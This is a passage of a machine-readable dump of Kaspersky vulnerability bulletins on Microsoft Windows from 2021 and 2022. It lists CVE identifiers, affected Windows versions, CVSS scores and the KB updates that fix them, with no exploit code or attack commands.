\n[CVE-2021-34480](<https://nvd.nist.gov/vuln/detail/CVE-2021-34480>) \n[CVE-2021-34534](<https://nvd.nist.gov/vuln/detail/CVE-2021-34534>) \n[CVE-2021-36927](<https://nvd.nist.gov/vuln/detail/CVE-2021-36927>) \n[CVE-2021-34486](<https://nvd.nist.gov/vuln/detail/CVE-2021-34486>) \n[CVE-2021-36932](<https://nvd.nist.gov/vuln/detail/CVE-2021-36932>) \n[CVE-2021-34533](<https://nvd.nist.gov/vuln/detail/CVE-2021-34533>) \n[CVE-2021-34537](<https://nvd.nist.gov/vuln/detail/CVE-2021-34537>) \n[CVE-2021-36937](<https://nvd.nist.gov/vuln/detail/CVE-2021-36937>) \n[CVE-2021-36936](<https://nvd.nist.gov/vuln/detail/CVE-2021-36936>) \n[CVE-2021-26425](<https://nvd.nist.gov/vuln/detail/CVE-2021-26425>) \n[CVE-2021-34483](<https://nvd.nist.gov/vuln/detail/CVE-2021-34483>) 
\n[CVE-2021-26431](<https://nvd.nist.gov/vuln/detail/CVE-2021-26431>) \n[CVE-2021-26426](<https://nvd.nist.gov/vuln/detail/CVE-2021-26426>) \n[CVE-2021-34536](<https://nvd.nist.gov/vuln/detail/CVE-2021-34536>) \n[CVE-2021-34484](<https://nvd.nist.gov/vuln/detail/CVE-2021-34484>) \n[CVE-2021-34535](<https://nvd.nist.gov/vuln/detail/CVE-2021-34535>) \n[CVE-2021-36933](<https://nvd.nist.gov/vuln/detail/CVE-2021-36933>) \n[CVE-2021-36938](<https://nvd.nist.gov/vuln/detail/CVE-2021-36938>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[4023814](<http://support.microsoft.com/kb/4023814>) \n[5005036](<http://support.microsoft.com/kb/5005036>) \n[5005031](<http://support.microsoft.com/kb/5005031>) \n[5005033](<http://support.microsoft.com/kb/5005033>) \n[5005030](<http://support.microsoft.com/kb/5005030>) \n[5005106](<http://support.microsoft.com/kb/5005106>) \n[5005040](<http://support.microsoft.com/kb/5005040>) \n[5005099](<http://support.microsoft.com/kb/5005099>) \n[5005043](<http://support.microsoft.com/kb/5005043>) \n[5005076](<http://support.microsoft.com/kb/5005076>) \n[5005094](<http://support.microsoft.com/kb/5005094>) \n[5011535](<http://support.microsoft.com/kb/5011535>) \n[5011564](<http://support.microsoft.com/kb/5011564>) \n[5011560](<http://support.microsoft.com/kb/5011560>) \n[5011527](<http://support.microsoft.com/kb/5011527>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T00:00:00", "type": "kaspersky", "title": 
"KLA12259 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26424", "CVE-2021-26425", "CVE-2021-26426", "CVE-2021-26431", "CVE-2021-26432", "CVE-2021-26433", "CVE-2021-34480", "CVE-2021-34483", "CVE-2021-34484", "CVE-2021-34486", "CVE-2021-34487", "CVE-2021-34530", "CVE-2021-34533", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-34536", "CVE-2021-34537", "CVE-2021-36926", "CVE-2021-36927", "CVE-2021-36932", "CVE-2021-36933", "CVE-2021-36936", "CVE-2021-36937", "CVE-2021-36938", "CVE-2021-36942", "CVE-2021-36945", "CVE-2021-36947", "CVE-2021-36948"], "modified": "2022-10-18T00:00:00", "id": "KLA12259", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12259/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:27:33", "description": "### *Detect date*:\n01/11/2022\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to bypass security restrictions, spoof user interface, obtain sensitive information, gain privileges, cause denial of service, execute arbitrary code.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. 
[More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server, version 20H2 (Server Core Installation) \nWindows 8.1 for x64-based systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2022 \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2022 (Server Core installation) \nWindows 11 for ARM64-based Systems \nWindows Server 2019 \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2016 \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 R2 \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 21H1 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 21H2 for 32-bit Systems \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 11 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 for 32-bit Systems 
\nWindows RT 8.1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-21924](<https://nvd.nist.gov/vuln/detail/CVE-2022-21924>) \n[CVE-2022-21905](<https://nvd.nist.gov/vuln/detail/CVE-2022-21905>) \n[CVE-2022-21925](<https://nvd.nist.gov/vuln/detail/CVE-2022-21925>) \n[CVE-2022-21836](<https://nvd.nist.gov/vuln/detail/CVE-2022-21836>) \n[CVE-2022-21880](<https://nvd.nist.gov/vuln/detail/CVE-2022-21880>) \n[CVE-2022-21900](<https://nvd.nist.gov/vuln/detail/CVE-2022-21900>) \n[CVE-2022-21859](<https://nvd.nist.gov/vuln/detail/CVE-2022-21859>) \n[CVE-2022-21883](<https://nvd.nist.gov/vuln/detail/CVE-2022-21883>) \n[CVE-2022-21833](<https://nvd.nist.gov/vuln/detail/CVE-2022-21833>) \n[CVE-2022-21915](<https://nvd.nist.gov/vuln/detail/CVE-2022-21915>) \n[CVE-2022-21890](<https://nvd.nist.gov/vuln/detail/CVE-2022-21890>) \n[CVE-2022-21908](<https://nvd.nist.gov/vuln/detail/CVE-2022-21908>) \n[CVE-2022-21893](<https://nvd.nist.gov/vuln/detail/CVE-2022-21893>) \n[CVE-2022-21834](<https://nvd.nist.gov/vuln/detail/CVE-2022-21834>) \n[CVE-2022-21904](<https://nvd.nist.gov/vuln/detail/CVE-2022-21904>) \n[CVE-2022-21922](<https://nvd.nist.gov/vuln/detail/CVE-2022-21922>) \n[CVE-2022-21838](<https://nvd.nist.gov/vuln/detail/CVE-2022-21838>) \n[CVE-2022-21848](<https://nvd.nist.gov/vuln/detail/CVE-2022-21848>) \n[CVE-2022-21884](<https://nvd.nist.gov/vuln/detail/CVE-2022-21884>) \n[CVE-2022-21897](<https://nvd.nist.gov/vuln/detail/CVE-2022-21897>) \n[CVE-2022-21850](<https://nvd.nist.gov/vuln/detail/CVE-2022-21850>) \n[CVE-2022-21857](<https://nvd.nist.gov/vuln/detail/CVE-2022-21857>) \n[CVE-2022-21862](<https://nvd.nist.gov/vuln/detail/CVE-2022-21862>) \n[CVE-2022-21913](<https://nvd.nist.gov/vuln/detail/CVE-2022-21913>) 
\n[CVE-2022-21835](<https://nvd.nist.gov/vuln/detail/CVE-2022-21835>) \n[CVE-2022-21903](<https://nvd.nist.gov/vuln/detail/CVE-2022-21903>) \n[CVE-2022-21889](<https://nvd.nist.gov/vuln/detail/CVE-2022-21889>) \n[CVE-2022-21919](<https://nvd.nist.gov/vuln/detail/CVE-2022-21919>) \n[CVE-2022-21899](<https://nvd.nist.gov/vuln/detail/CVE-2022-21899>) \n[CVE-2022-21914](<https://nvd.nist.gov/vuln/detail/CVE-2022-21914>) \n[CVE-2022-21885](<https://nvd.nist.gov/vuln/detail/CVE-2022-21885>) \n[CVE-2022-21851](<https://nvd.nist.gov/vuln/detail/CVE-2022-21851>) \n[CVE-2022-21843](<https://nvd.nist.gov/vuln/detail/CVE-2022-21843>) \n[CVE-2022-21920](<https://nvd.nist.gov/vuln/detail/CVE-2022-21920>) \n[CVE-2022-21916](<https://nvd.nist.gov/vuln/detail/CVE-2022-21916>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2022-21925](<https://vulners.com/cve/CVE-2022-21925>)5.0Critical \n[CVE-2022-21859](<https://vulners.com/cve/CVE-2022-21859>)6.9High \n[CVE-2022-21915](<https://vulners.com/cve/CVE-2022-21915>)5.0Critical \n[CVE-2022-21908](<https://vulners.com/cve/CVE-2022-21908>)5.0Critical \n[CVE-2022-21834](<https://vulners.com/cve/CVE-2022-21834>)7.2High \n[CVE-2022-21922](<https://vulners.com/cve/CVE-2022-21922>)5.0Critical \n[CVE-2022-21838](<https://vulners.com/cve/CVE-2022-21838>)7.2High \n[CVE-2022-21850](<https://vulners.com/cve/CVE-2022-21850>)9.3Critical \n[CVE-2022-21913](<https://vulners.com/cve/CVE-2022-21913>)5.0Critical \n[CVE-2022-21835](<https://vulners.com/cve/CVE-2022-21835>)7.2High \n[CVE-2022-21903](<https://vulners.com/cve/CVE-2022-21903>)5.0Critical \n[CVE-2022-21889](<https://vulners.com/cve/CVE-2022-21889>)5.0Critical \n[CVE-2022-21919](<https://vulners.com/cve/CVE-2022-21919>)5.0Critical \n[CVE-2022-21851](<https://vulners.com/cve/CVE-2022-21851>)9.3Critical \n[CVE-2022-21920](<https://vulners.com/cve/CVE-2022-21920>)5.0Critical 
\n[CVE-2022-21924](<https://vulners.com/cve/CVE-2022-21924>)5.0Critical \n[CVE-2022-21905](<https://vulners.com/cve/CVE-2022-21905>)5.0Critical \n[CVE-2022-21836](<https://vulners.com/cve/CVE-2022-21836>)7.2High \n[CVE-2022-21900](<https://vulners.com/cve/CVE-2022-21900>)5.0Critical \n[CVE-2022-21880](<https://vulners.com/cve/CVE-2022-21880>)7.8Critical \n[CVE-2022-21883](<https://vulners.com/cve/CVE-2022-21883>)5.0Critical \n[CVE-2022-21833](<https://vulners.com/cve/CVE-2022-21833>)7.2High \n[CVE-2022-21890](<https://vulners.com/cve/CVE-2022-21890>)5.0Critical \n[CVE-2022-21893](<https://vulners.com/cve/CVE-2022-21893>)5.0Critical \n[CVE-2022-21904](<https://vulners.com/cve/CVE-2022-21904>)5.0Critical \n[CVE-2022-21848](<https://vulners.com/cve/CVE-2022-21848>)7.1High \n[CVE-2022-21884](<https://vulners.com/cve/CVE-2022-21884>)5.0Critical \n[CVE-2022-21897](<https://vulners.com/cve/CVE-2022-21897>)5.0Critical \n[CVE-2022-21857](<https://vulners.com/cve/CVE-2022-21857>)9.0Critical \n[CVE-2022-21862](<https://vulners.com/cve/CVE-2022-21862>)6.9High \n[CVE-2022-21899](<https://vulners.com/cve/CVE-2022-21899>)5.0Critical \n[CVE-2022-21885](<https://vulners.com/cve/CVE-2022-21885>)5.0Critical \n[CVE-2022-21914](<https://vulners.com/cve/CVE-2022-21914>)5.0Critical \n[CVE-2022-21843](<https://vulners.com/cve/CVE-2022-21843>)4.3Warning \n[CVE-2022-21916](<https://vulners.com/cve/CVE-2022-21916>)5.0Critical\n\n### *KB list*:\n[5009627](<http://support.microsoft.com/kb/5009627>) \n[5009601](<http://support.microsoft.com/kb/5009601>) \n[5009621](<http://support.microsoft.com/kb/5009621>) \n[5009610](<http://support.microsoft.com/kb/5009610>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-01-11T00:00:00", "type": "kaspersky", "title": "KLA12423 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21848", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21857", "CVE-2022-21859", "CVE-2022-21862", "CVE-2022-21880", "CVE-2022-21883", "CVE-2022-21884", "CVE-2022-21885", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21893", "CVE-2022-21897", "CVE-2022-21899", "CVE-2022-21900", "CVE-2022-21903", "CVE-2022-21904", "CVE-2022-21905", "CVE-2022-21908", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925"], "modified": "2022-01-18T00:00:00", "id": "KLA12423", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12423/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-28T14:08:09", "description": "### *Detect date*:\n01/11/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. 
Malicious users can exploit these vulnerabilities to gain privileges, execute arbitrary code, obtain sensitive information, bypass security restrictions, cause denial of service, spoof user interface.\n\n### *Exploitation*:\nPublic exploits exist for this vulnerability.\n\n### *Affected products*:\nWindows Server, version 20H2 (Server Core Installation) \nWindows 8.1 for x64-based systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2022 \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2022 (Server Core installation) \nWindows 11 for ARM64-based Systems \nWindows Server 2019 \nWindows 10 Version 1809 for ARM64-based Systems \nWindows Server 2016 \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2016 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 R2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for x64-based Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 21H2 for 32-bit Systems \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 10 Version 1909 for 
ARM64-based Systems \nWindows 11 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows RT 8.1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-21860](<https://nvd.nist.gov/vuln/detail/CVE-2022-21860>) \n[CVE-2022-21959](<https://nvd.nist.gov/vuln/detail/CVE-2022-21959>) \n[CVE-2022-21852](<https://nvd.nist.gov/vuln/detail/CVE-2022-21852>) \n[CVE-2022-21859](<https://nvd.nist.gov/vuln/detail/CVE-2022-21859>) \n[CVE-2022-21915](<https://nvd.nist.gov/vuln/detail/CVE-2022-21915>) \n[CVE-2022-21875](<https://nvd.nist.gov/vuln/detail/CVE-2022-21875>) \n[CVE-2022-21908](<https://nvd.nist.gov/vuln/detail/CVE-2022-21908>) \n[CVE-2021-36976](<https://nvd.nist.gov/vuln/detail/CVE-2021-36976>) \n[CVE-2022-21834](<https://nvd.nist.gov/vuln/detail/CVE-2022-21834>) \n[CVE-2022-21864](<https://nvd.nist.gov/vuln/detail/CVE-2022-21864>) \n[CVE-2022-21910](<https://nvd.nist.gov/vuln/detail/CVE-2022-21910>) \n[CVE-2022-21898](<https://nvd.nist.gov/vuln/detail/CVE-2022-21898>) \n[CVE-2022-21922](<https://nvd.nist.gov/vuln/detail/CVE-2022-21922>) \n[CVE-2022-21881](<https://nvd.nist.gov/vuln/detail/CVE-2022-21881>) \n[CVE-2022-21838](<https://nvd.nist.gov/vuln/detail/CVE-2022-21838>) \n[CVE-2022-21867](<https://nvd.nist.gov/vuln/detail/CVE-2022-21867>) \n[CVE-2022-21901](<https://nvd.nist.gov/vuln/detail/CVE-2022-21901>) \n[CVE-2022-21865](<https://nvd.nist.gov/vuln/detail/CVE-2022-21865>) \n[CVE-2022-21850](<https://nvd.nist.gov/vuln/detail/CVE-2022-21850>) \n[CVE-2022-21870](<https://nvd.nist.gov/vuln/detail/CVE-2022-21870>) \n[CVE-2022-21912](<https://nvd.nist.gov/vuln/detail/CVE-2022-21912>) 
\n[CVE-2022-21913](<https://nvd.nist.gov/vuln/detail/CVE-2022-21913>) \n[CVE-2022-21894](<https://nvd.nist.gov/vuln/detail/CVE-2022-21894>) \n[CVE-2022-21960](<https://nvd.nist.gov/vuln/detail/CVE-2022-21960>) \n[CVE-2022-21879](<https://nvd.nist.gov/vuln/detail/CVE-2022-21879>) \n[CVE-2022-21835](<https://nvd.nist.gov/vuln/detail/CVE-2022-21835>) \n[CVE-2022-21903](<https://nvd.nist.gov/vuln/detail/CVE-2022-21903>) \n[CVE-2022-21964](<https://nvd.nist.gov/vuln/detail/CVE-2022-21964>) \n[CVE-2022-21907](<https://nvd.nist.gov/vuln/detail/CVE-2022-21907>) \n[CVE-2022-21889](<https://nvd.nist.gov/vuln/detail/CVE-2022-21889>) \n[CVE-2022-21866](<https://nvd.nist.gov/vuln/detail/CVE-2022-21866>) \n[CVE-2021-22947](<https://nvd.nist.gov/vuln/detail/CVE-2021-22947>) \n[CVE-2022-21919](<https://nvd.nist.gov/vuln/detail/CVE-2022-21919>) \n[CVE-2022-21851](<https://nvd.nist.gov/vuln/detail/CVE-2022-21851>) \n[CVE-2022-21920](<https://nvd.nist.gov/vuln/detail/CVE-2022-21920>) \n[CVE-2022-21888](<https://nvd.nist.gov/vuln/detail/CVE-2022-21888>) \n[CVE-2022-21868](<https://nvd.nist.gov/vuln/detail/CVE-2022-21868>) \n[CVE-2022-21963](<https://nvd.nist.gov/vuln/detail/CVE-2022-21963>) \n[CVE-2022-21958](<https://nvd.nist.gov/vuln/detail/CVE-2022-21958>) \n[CVE-2022-21928](<https://nvd.nist.gov/vuln/detail/CVE-2022-21928>) \n[CVE-2022-21924](<https://nvd.nist.gov/vuln/detail/CVE-2022-21924>) \n[CVE-2022-21905](<https://nvd.nist.gov/vuln/detail/CVE-2022-21905>) \n[CVE-2022-21836](<https://nvd.nist.gov/vuln/detail/CVE-2022-21836>) \n[CVE-2022-21839](<https://nvd.nist.gov/vuln/detail/CVE-2022-21839>) \n[CVE-2022-21918](<https://nvd.nist.gov/vuln/detail/CVE-2022-21918>) \n[CVE-2022-21900](<https://nvd.nist.gov/vuln/detail/CVE-2022-21900>) \n[CVE-2022-21880](<https://nvd.nist.gov/vuln/detail/CVE-2022-21880>) \n[CVE-2022-21883](<https://nvd.nist.gov/vuln/detail/CVE-2022-21883>) \n[CVE-2022-21882](<https://nvd.nist.gov/vuln/detail/CVE-2022-21882>) 
\n[CVE-2022-21902](<https://nvd.nist.gov/vuln/detail/CVE-2022-21902>) \n[CVE-2022-21833](<https://nvd.nist.gov/vuln/detail/CVE-2022-21833>) \n[CVE-2022-21877](<https://nvd.nist.gov/vuln/detail/CVE-2022-21877>) \n[CVE-2022-21871](<https://nvd.nist.gov/vuln/detail/CVE-2022-21871>) \n[CVE-2022-21874](<https://nvd.nist.gov/vuln/detail/CVE-2022-21874>) \n[CVE-2022-21890](<https://nvd.nist.gov/vuln/detail/CVE-2022-21890>) \n[CVE-2022-21917](<https://nvd.nist.gov/vuln/detail/CVE-2022-21917>) \n[CVE-2022-21893](<https://nvd.nist.gov/vuln/detail/CVE-2022-21893>) \n[CVE-2022-21904](<https://nvd.nist.gov/vuln/detail/CVE-2022-21904>) \n[CVE-2022-21876](<https://nvd.nist.gov/vuln/detail/CVE-2022-21876>) \n[CVE-2022-21848](<https://nvd.nist.gov/vuln/detail/CVE-2022-21848>) \n[CVE-2022-21847](<https://nvd.nist.gov/vuln/detail/CVE-2022-21847>) \n[CVE-2022-21896](<https://nvd.nist.gov/vuln/detail/CVE-2022-21896>) \n[CVE-2022-21961](<https://nvd.nist.gov/vuln/detail/CVE-2022-21961>) \n[CVE-2022-21887](<https://nvd.nist.gov/vuln/detail/CVE-2022-21887>) \n[CVE-2022-21884](<https://nvd.nist.gov/vuln/detail/CVE-2022-21884>) \n[CVE-2022-21897](<https://nvd.nist.gov/vuln/detail/CVE-2022-21897>) \n[CVE-2022-21857](<https://nvd.nist.gov/vuln/detail/CVE-2022-21857>) \n[CVE-2022-21862](<https://nvd.nist.gov/vuln/detail/CVE-2022-21862>) \n[CVE-2022-21878](<https://nvd.nist.gov/vuln/detail/CVE-2022-21878>) \n[CVE-2022-21858](<https://nvd.nist.gov/vuln/detail/CVE-2022-21858>) \n[CVE-2022-21849](<https://nvd.nist.gov/vuln/detail/CVE-2022-21849>) \n[CVE-2022-21921](<https://nvd.nist.gov/vuln/detail/CVE-2022-21921>) \n[CVE-2022-21906](<https://nvd.nist.gov/vuln/detail/CVE-2022-21906>) \n[CVE-2022-21873](<https://nvd.nist.gov/vuln/detail/CVE-2022-21873>) \n[CVE-2022-21899](<https://nvd.nist.gov/vuln/detail/CVE-2022-21899>) \n[CVE-2022-21885](<https://nvd.nist.gov/vuln/detail/CVE-2022-21885>) \n[CVE-2022-21895](<https://nvd.nist.gov/vuln/detail/CVE-2022-21895>) 
\n[CVE-2022-21914](<https://nvd.nist.gov/vuln/detail/CVE-2022-21914>) \n[CVE-2022-21861](<https://nvd.nist.gov/vuln/detail/CVE-2022-21861>) \n[CVE-2022-21872](<https://nvd.nist.gov/vuln/detail/CVE-2022-21872>) \n[CVE-2022-21892](<https://nvd.nist.gov/vuln/detail/CVE-2022-21892>) \n[CVE-2022-21869](<https://nvd.nist.gov/vuln/detail/CVE-2022-21869>) \n[CVE-2022-21843](<https://nvd.nist.gov/vuln/detail/CVE-2022-21843>) \n[CVE-2022-21863](<https://nvd.nist.gov/vuln/detail/CVE-2022-21863>) \n[CVE-2022-21916](<https://nvd.nist.gov/vuln/detail/CVE-2022-21916>) \n[CVE-2022-21962](<https://nvd.nist.gov/vuln/detail/CVE-2022-21962>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2022-21860](<https://vulners.com/cve/CVE-2022-21860>)4.4Warning \n[CVE-2022-21959](<https://vulners.com/cve/CVE-2022-21959>)7.2High \n[CVE-2022-21852](<https://vulners.com/cve/CVE-2022-21852>)7.2High \n[CVE-2022-21859](<https://vulners.com/cve/CVE-2022-21859>)6.9High \n[CVE-2022-21915](<https://vulners.com/cve/CVE-2022-21915>)4.0Warning \n[CVE-2022-21875](<https://vulners.com/cve/CVE-2022-21875>)7.2High \n[CVE-2022-21908](<https://vulners.com/cve/CVE-2022-21908>)7.2High \n[CVE-2021-36976](<https://vulners.com/cve/CVE-2021-36976>)4.3Warning \n[CVE-2022-21834](<https://vulners.com/cve/CVE-2022-21834>)7.2High \n[CVE-2022-21864](<https://vulners.com/cve/CVE-2022-21864>)4.4Warning \n[CVE-2022-21910](<https://vulners.com/cve/CVE-2022-21910>)4.6Warning \n[CVE-2022-21922](<https://vulners.com/cve/CVE-2022-21922>)9.0Critical \n[CVE-2022-21881](<https://vulners.com/cve/CVE-2022-21881>)7.2High \n[CVE-2022-21838](<https://vulners.com/cve/CVE-2022-21838>)7.2High \n[CVE-2022-21867](<https://vulners.com/cve/CVE-2022-21867>)6.9High \n[CVE-2022-21901](<https://vulners.com/cve/CVE-2022-21901>)7.7Critical \n[CVE-2022-21865](<https://vulners.com/cve/CVE-2022-21865>)4.4Warning 
\n[CVE-2022-21850](<https://vulners.com/cve/CVE-2022-21850>)9.3Critical \n[CVE-2022-21870](<https://vulners.com/cve/CVE-2022-21870>)7.2High \n[CVE-2022-21912](<https://vulners.com/cve/CVE-2022-21912>)7.2High \n[CVE-2022-21913](<https://vulners.com/cve/CVE-2022-21913>)5.0Warning \n[CVE-2022-21894](<https://vulners.com/cve/CVE-2022-21894>)4.9Warning \n[CVE-2022-21960](<https://vulners.com/cve/CVE-2022-21960>)7.2High \n[CVE-2022-21879](<https://vulners.com/cve/CVE-2022-21879>)7.2High \n[CVE-2022-21835](<https://vulners.com/cve/CVE-2022-21835>)7.2High \n[CVE-2022-21903](<https://vulners.com/cve/CVE-2022-21903>)7.2High \n[CVE-2022-21964](<https://vulners.com/cve/CVE-2022-21964>)4.9Warning \n[CVE-2022-21889](<https://vulners.com/cve/CVE-2022-21889>)4.3Warning \n[CVE-2022-21866](<https://vulners.com/cve/CVE-2022-21866>)4.4Warning \n[CVE-2021-22947](<https://vulners.com/cve/CVE-2021-22947>)4.3Warning \n[CVE-2022-21919](<https://vulners.com/cve/CVE-2022-21919>)6.9High \n[CVE-2022-21851](<https://vulners.com/cve/CVE-2022-21851>)9.3Critical \n[CVE-2022-21920](<https://vulners.com/cve/CVE-2022-21920>)9.0Critical \n[CVE-2022-21888](<https://vulners.com/cve/CVE-2022-21888>)9.3Critical \n[CVE-2022-21868](<https://vulners.com/cve/CVE-2022-21868>)6.9High \n[CVE-2022-21963](<https://vulners.com/cve/CVE-2022-21963>)7.2High \n[CVE-2022-21958](<https://vulners.com/cve/CVE-2022-21958>)7.2High \n[CVE-2022-21928](<https://vulners.com/cve/CVE-2022-21928>)6.9High \n[CVE-2022-21924](<https://vulners.com/cve/CVE-2022-21924>)5.4High \n[CVE-2022-21905](<https://vulners.com/cve/CVE-2022-21905>)4.9Warning \n[CVE-2022-21836](<https://vulners.com/cve/CVE-2022-21836>)7.2High \n[CVE-2022-21839](<https://vulners.com/cve/CVE-2022-21839>)2.1Warning \n[CVE-2022-21918](<https://vulners.com/cve/CVE-2022-21918>)4.9Warning \n[CVE-2022-21900](<https://vulners.com/cve/CVE-2022-21900>)3.8Warning \n[CVE-2022-21880](<https://vulners.com/cve/CVE-2022-21880>)7.8Critical 
